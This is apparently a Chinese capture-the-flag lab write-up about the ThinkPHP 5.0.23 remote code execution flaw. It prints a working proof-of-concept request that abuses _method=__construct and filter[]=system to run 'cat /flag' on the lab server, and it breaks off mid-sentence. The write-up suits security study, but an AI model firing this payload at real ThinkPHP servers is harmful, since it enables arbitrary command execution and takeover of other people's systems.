1.阅读靶场介绍

这里我们可以得到的用信息就是
ThinkPHP5.0.23以前的版本中
获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致RCE
2.启动靶场
我们会得到下面的页面

3.poc
构造url:https://eci-2ze41du84bufpbeytfn5.cloudeci1.ichunqiu.com:80/public/index.php?s=captcha
发送参数:
_method=__construct&filter\[\]=system&method=get&serverREQUEST_METHOD=cat /flag
到此,恭喜各位用攻克一个靶场了
期待下一篇文章的欢迎留言,博主会尽快更新
感谢你们宝贵的时